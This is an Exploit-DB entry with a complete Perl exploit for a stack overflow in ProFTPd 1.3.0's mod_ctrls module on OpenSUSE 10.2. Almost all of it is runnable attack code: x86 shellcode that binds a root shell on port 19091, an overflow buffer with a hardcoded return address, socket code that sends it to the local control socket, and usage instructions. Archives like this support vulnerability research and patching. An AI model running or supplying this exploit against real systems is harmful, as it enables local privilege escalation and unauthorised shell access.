ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow

EDB-ID:

10044

CVE:

N/A


Platform:

Unix

Published:

2009-10-12

#!/usr/bin/perl -w
#
# Exploit for the ProFTPd mod_ctrls vulnerability.
# Stack Overflow in function
# int pr_ctrls_recv_request(pr_crls_cl_t *cl)
# unchecked buffer for arguments of the module
#
# connects to the unix domain socket and sends a string
# that is longer than the buffer (char[512]).
#
# Cheers to Alfredo "revenge" Pesoli for the implementation 
# on Ubuntu and Debian Etch
#
# works on OpenSuSE 10.2 on i686
# 
# http://www.devtarget.org
# Michael Domberg
#
# Usage: $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /path/to/local/socket
#
# Example (on OpenSuSE 10.2):
# $ /usr/bin/perl proftpd-mod_ctrls-opensuse10_2.pl /usr/local/var/proftpd/proftpd.sock
#
###############################
use strict;
use Socket;

# bind on port 19091
my $shell = 
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x4a\x93\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

print "[+] Preparing attack string...\n";

my $rsock   = shift;

my $buf = "A"x520; 

use constant TEMPSOCK  => '/tmp/tmp.sock';

$buf = $buf."\0\0\x0a\xff"."AAAAaaaaAAAAaaaa"."\x77\xe7\xff\xff".$shell;
my $l = length($buf);
print "[+] Opening Unix Domain Socket to mod_ctrls \n";

socket (SOCK, PF_UNIX, SOCK_STREAM, 0)  or die "[-] Socket creation failed : $!";
my $rfile = sockaddr_un($rsock);

unlink TEMPSOCK;
my $lfile = sockaddr_un(TEMPSOCK);

bind (SOCK, $lfile) or die "[-] Creation of Unix Domain Socket failed. ($lfile)";
chmod (00700, TEMPSOCK);

connect (SOCK, $rfile) or die "\n [-] Connection to control socket failed.\n\n";

print "[+] Sending attack...\n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buf,0;

close SOCK;

print "\n [+] Attack String sent. Try to connect to Port 19091\n\n";